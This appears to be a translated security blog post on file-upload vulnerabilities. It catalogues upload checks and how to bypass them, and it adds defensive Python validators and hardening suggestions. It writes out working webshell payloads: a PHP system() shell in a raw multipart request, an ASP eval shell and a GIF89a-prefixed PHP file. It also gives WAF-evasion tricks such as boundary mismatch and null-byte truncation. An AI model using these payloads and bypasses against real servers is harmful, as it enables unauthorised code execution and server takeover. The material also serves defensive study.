File upload vulnerability (bypass gesture)

The file upload vulnerability is arguably the most frequently used vulnerability in day-to-day penetration testing, because it is the fastest and most direct way to obtain control of the server. Actually exploiting it, however, is not that easy: there are many techniques and a lot of background knowledge to master. As the saying goes, know the enemy and know yourself; if you want to study how to defend against a vulnerability, you must first understand how it is exploited. This article has three parts: a summary of common upload verification methods, the various postures for bypassing them, and finally some protection suggestions for this vulnerability. (Based on personal experience; corrections and additions are welcome.)

File upload verification postures

  • Client-side JavaScript check (generally only checks the extension)
  • Server-side verification
      • Content-Type field check (image/gif)
      • File content header check (GIF89a)
      • Extension blacklist check
      • Extension whitelist check
      • Custom regular-expression check
  • WAF device verification (depends on the WAF product)

1. Client-side verification

Typically a JavaScript script on the web page checks the extension of the selected file; both whitelist and blacklist forms exist.
How to recognise it: a dialog box pops up as soon as the file is selected, before the upload button is clicked (for example "only files with the .jpg/.jpeg/.png extension may be uploaded"), and no request is sent at that moment.

2. Server-side verification

2.1 Content-Type field check

PHP code is used here as an example to simulate the verification code on the web server.

<?php
# 'type' is taken from the client-supplied Content-Type header of the file part; anything other than image/gif is rejected
if ($_FILES['userfile']['type'] != "image/gif")
{
    echo "Sorry, we only allow uploading GIF images";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

As you can see, the code only checks the declared file type of the upload and returns an error if it is not the image type.

2.2 File header verification

A regular-expression match on the first bytes of the file can determine whether the file header meets the requirements. Some common file-header correspondences:


File upload bypass verification postures

  • Client-side bypass (intercept and modify the request)
  • Server-side bypass
      • File type
      • File header
      • File extension
  • Bypass combined with file inclusion vulnerabilities
  • Bypass combined with server parsing vulnerabilities
  • CMS and editor vulnerability bypass
  • Bypass using operating system file naming rules
  • Bypass using other rules
  • WAF bypass

1. Client-side bypass

Intercept the request with Burp: first upload a webshell ("Trojan") with a .gif extension, then change the extension to asp/php/jsp in the intercepted request.

2. Server-side bypass

2.1 File type bypass

Intercept the request and change the Content-Type field to image/gif.

POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155

--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"

<?php system($_GET['command']);?>
--xYzZY--

2.2 File header bypass

Prepend some file-header bytes to the webshell content, roughly like the following:
GIF89a<?php phpinfo(); ?>

2.3 File extension bypass

Prerequisite: blacklist verification
Blacklist detection: there is usually a dedicated blacklist file listing the common dangerous script extensions.
Bypass methods:
(1) Find extensions missing from the blacklist, such as asa and cer
(2) There may be a case-sensitivity flaw, such as aSp and pHp
Extensions that may be parsed as scripts:
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

3. Combining with file inclusion vulnerabilities

Prerequisite: the verification rule only checks whether the content of files with the asp/php/jsp extension is a webshell.
Bypass method (taking PHP as the example; this vulnerability mainly exists in PHP):
(1) First upload a file with the .txt extension whose content is the webshell; because of its extension, its content is not inspected;
(2) Then upload a .php file containing <?php include("path of the uploaded txt file"); ?>
The PHP file then pulls in the content of the txt file, bypassing the validation. The include syntax for each language:

# PHP
<?php include("path of the uploaded txt file"); ?>
# ASP
<!--#include file="path of the uploaded txt file" -->
# JSP
<jsp:include page="path of the uploaded txt file"/>
or
<%@ include file="path of the uploaded txt file" %>

Detailed reference: [File inclusion vulnerabilities (bypass postures)](http://thief.one/2017/04/10/2/)

4. Combining with server parsing vulnerabilities

For details see: [http://thief.one/2016/09/21/Server Resolution Vulnerability/](http://thief.one/2016/09/21/Server Resolution Vulnerability/)

5. Using operating system file naming rules

(1) Upload a file name that does not conform to the Windows file naming rules, e.g.
test.asp (followed by a space)
Windows automatically strips the trailing characters that violate its naming rules.
(2) Extension case under Linux
Under Linux, if an uploaded .php file is not parsed, try uploading it with the extension pHp.

6. CMS and editor vulnerabilities

(1) CMS vulnerabilities: for example, upload vulnerabilities present in particular CMSs such as JCMS can be used to bypass the checks.
(2) Editor vulnerabilities: for example, vulnerabilities in FCKeditor, eWebEditor and similar editors can be used to bypass the checks.
These two areas are documented and summarised separately.

7. Combining with other rules

(1) 0x00 truncation: based on a combined logic flaw; it usually exists where the path of the uploaded file is constructed.
Path /upload/1.php(0x00), file name 1.jpg; the combination yields /upload/1.php(0x00)/1.jpg
Pseudocode demonstration:

name = getname(httprequest)                // suppose the file name obtained here is help.asp(0x00).jpg, with a 0x00 byte after asp
type = gettype(name)                       // gettype() scans for the extension from the end of the name, so it returns jpg
if (type == jpg)
    SaveFileToPath(UploadPath.name, name)  // but the file name is truncated at the 0x00 when it is saved
                                           // so the file finally ends up saved as help.asp

8. WAF bypass

8.1 Junk data

To protect the performance of the web server, some host WAF products set an upper limit (for example 1M) on the amount of user data they inspect. In that case a large file can be constructed: the first 1M is junk data and the real webshell content follows it, so the WAF never inspects the real file content.

The junk data can also be placed at the very beginning of the request, which can bypass the check on the file name as well.

The junk data can also be added after the Content-Disposition parameter; an over-long parameter may cause the WAF's detection to fail.

8.2 filename

For earlier versions of Safedog, an extra filename parameter can be added:

Or move the filename to a different position. Under IIS 6.0, the same can be done by changing the way it is written and placing filename elsewhere:

8.3 POST/GET

Some WAF rules are written as: if the request is a POST, verify the request body.
In that case, send the upload as a POST request, intercept it, and change POST to GET.

8.4 The methods above

Against a WAF, the server parsing vulnerabilities and file inclusion vulnerabilities described above can also be tried.

———————————————— 2017.2.6 update ————————————————

8.5 Using defects in the WAF itself

Delete the Content-Type field in the file part

The first way is to delete the entire Content-Type line; the second is to delete the characters after the C: remove "ontent-Type: image/jpeg", leaving only the C, and append .php to it. Pay attention to how much is removed: the double quote must directly follow C.php.

C.php"

Delete the spaces in the Content-Disposition field

Content-Type: multipart/form-data; boundary=---------------------------4714631421141173021852555099
Try adding a space, or another character that is still processed normally, after boundary=:
boundary= ---------------------------47146314211411730218525550

Modify the case of the Content-Disposition field value

Inconsistent boundaries

Normally the boundary in the header and the boundary in the body are the same every time a file is uploaded:

Content-Type: multipart/form-data; boundary=---------------------------4714631421141173021852555099
Content-Length: 253

-----------------------------4714631421141173021852555099
Content-Disposition: form-data; name="file1"; filename="shell.asp"
Content-Type: application/octet-stream

<%eval request("a")%>
-----------------------------4714631421141173021852555099--

However, if the container is not strict when processing the request, this can cause a problem: when the two boundaries differ, the WAF regards the data as meaningless, but the container still processes it. Confirmed on:
Win2k3 + IIS6.0 + ASP

Enter the file name

Multiple Content-Disposition fields

In an IIS environment, if the upload request contains multiple Content-Disposition fields, IIS takes the value of the first one as the received parameter; if the WAF happens to take the last one, it is bypassed. Confirmed on Win2k8 + IIS7.0 + PHP.

Using the NTFS ADS feature

ADS (Alternate Data Streams) is a feature of the NTFS file system. When a file is uploaded, the WAF may be bypassed if it does not match the file name in the request body strictly enough.
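Seen from the defender's side, each of the malformations in 8.5 is something a strict multipart parser can simply refuse to process. The following Python is an added example, not code from the original post or from any WAF product: it checks a raw upload request for a header/body boundary mismatch, a space after boundary=, leftover non-header lines such as C.php", more than one Content-Disposition in a part, a file part without Content-Type, and NUL, separator or ADS characters in the file name. The sample requests are constructed inline; the boundary string and host name are made up.

```python
import re

def check_multipart(raw: bytes):
    """Return (True, filename) for a well-formed upload request, else (False, reason)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"^Content-Type:\s*multipart/form-data;\s*boundary=(\S+)\s*$",
                  head, re.I | re.M)
    if not m:                                       # also catches 'boundary= ----...'
        return False, "missing or malformed multipart Content-Type"
    delim = b"--" + m.group(1).strip(b'"')
    # Every delimiter in the body must match the boundary declared in the header.
    if not (body.startswith(delim + b"\r\n") and body.rstrip().endswith(delim + b"--")):
        return False, "body boundary differs from header boundary"
    filename = None
    for part in body.split(delim)[1:-1]:
        lines = [l for l in part.partition(b"\r\n\r\n")[0].split(b"\r\n") if l]
        if any(not re.match(rb"[A-Za-z-]+:\s*\S", l) for l in lines):
            return False, "malformed part header line"    # e.g. the leftover 'C.php"'
        disp = [l for l in lines if l.lower().startswith(b"content-disposition:")]
        if len(disp) != 1:
            return False, "expected exactly one Content-Disposition per part"
        fn = re.search(rb'filename="([^"]*)"', disp[0])
        if fn:
            if not any(l.lower().startswith(b"content-type:") for l in lines):
                return False, "file part without Content-Type"
            filename = fn.group(1)
            # NUL truncation, control chars, path separators, ';', ':' (NTFS ADS), trailing dot/space
            if re.search(rb"[\x00-\x1f;/\\:]", filename) or filename != filename.rstrip(b". "):
                return False, "illegal characters in filename"
    return True, filename

def build_request(hdr_boundary, body_boundary, part_headers, content):
    """Constructed sample request builder (not captured traffic)."""
    d = b"--" + body_boundary
    body = d + b"\r\n" + b"\r\n".join(part_headers) + b"\r\n\r\n" + content + b"\r\n" + d + b"--\r\n"
    head = (b"POST /upload HTTP/1.1\r\nHost: app.example\r\nContent-Type: multipart/form-data; "
            b"boundary=" + hdr_boundary + b"\r\nContent-Length: " + str(len(body)).encode())
    return head + b"\r\n\r\n" + body

B = b"----ConstructedBoundary7MA4YWxk"                 # made-up boundary for the samples
DISP = b'Content-Disposition: form-data; name="file1"; filename="cat.gif"'
CT = b"Content-Type: image/gif"
GIF = b"GIF89a\x01\x00\x01\x00"
GOOD_REQ = build_request(B, B, [DISP, CT], GIF)
BAD_BOUNDARY = build_request(B, B + b"x", [DISP, CT], GIF)   # boundaries inconsistent
DOUBLE_DISP = build_request(B, B, [DISP, DISP, CT], GIF)     # multiple Content-Disposition
NO_PART_CT = build_request(B, B, [DISP], GIF)                # Content-Type line deleted
NUL_NAME = build_request(B, B, [DISP.replace(b"cat.gif", b"help.asp\x00.gif"), CT], GIF)
```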

Additional cases

File renaming bypass

If the web application renames the file but keeps the extension as submitted, you can construct names with extra dots, symbols and so on.

Special long file name bypass

Use non-alphanumeric characters in the file name, such as Chinese characters, stretched to the maximum length. If that alone does not work, combine it with the other features above, e.g.:
Shell.asp;王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王.jpg

Avoiding deletion

Change file1 below to file4 so that the file is not deleted. (JCMS vulnerability)


Suggestions for file verification

  • Server-side whitelist verification of the file extension.
  • Server-side verification of the file content.
  • Rename the uploaded file.
  • Hide the path of the uploaded file.

These measures protect against most upload vulnerabilities, but they must be combined with the server container: if a parsing vulnerability still exists, there is no absolute security.
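The four suggestions, together with the edge cases from sections 2, 5 and 7 (extension case, NUL truncation, trailing dot or space, a GIF89a header with a script body behind it), as a Python example added here rather than code from the original post: the client's Content-Type is ignored, only the last extension counts and must be whitelisted, the first bytes must match that extension, and the accepted file is stored under a random name in a directory outside the web root. The magic-byte table and the store directory are assumptions made for the example.

```python
import os
import re
import secrets

# Constructed policy: whitelisted extension -> magic bytes a genuine file of that type starts with.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Script openers that may ride inside an otherwise valid image (GIF89a<?php ... ?>).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")

def check_upload(client_name: str, data: bytes):
    """Return (True, extension) if the upload is accepted, else (False, reason).
    The client's Content-Type header is ignored on purpose: it is attacker controlled."""
    if "\x00" in client_name or re.search(r"[;/\\:\r\n]", client_name):
        return False, "illegal character in filename"      # help.asp(0x00).jpg, shell.asp;.jpg, ADS
    if client_name != client_name.rstrip(". "):
        return False, "trailing dot or space in filename"  # Windows would strip it: test.asp<space>
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED:                                 # whitelist, case-insensitive (pHp)
        return False, f"extension not allowed: {ext!r}"
    if not data.startswith(ALLOWED[ext]):                  # file header must match the extension
        return False, "content does not match extension"
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in file"
    return True, ext

def store_upload(client_name: str, data: bytes, store_dir: str) -> str:
    """Save an accepted file under a random name in a directory outside the web root and
    return only the opaque id; the application serves it through a handler, never by path."""
    ok, result = check_upload(client_name, data)
    if not ok:
        raise ValueError(result)
    file_id = secrets.token_hex(16)
    os.makedirs(store_dir, exist_ok=True)
    with open(os.path.join(store_dir, f"{file_id}.{result}"), "wb") as fh:
        fh.write(data)
    return file_id
```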

Reference article:
https://xianzhi.aliyun.com/forum/read/458.html?fpage=2

  • There is also an article by a senior expert on the related tools; the URL cannot be located for now.

Portal

[File inclusion vulnerabilities (bypass postures)](http://thief.one/2017/04/10/2/)

Title: File upload vulnerability (bypass gesture)

Author: nmask

Published: 2016-09-22 11:09

Last updated: 2019-07-11 16:07

Original link: https://thief.one/2016/09/22/Upload Trojan Posture Summary - Welcome to add/

License: CC BY-NC-ND 4.0 International. When reposting, keep the original link and author.
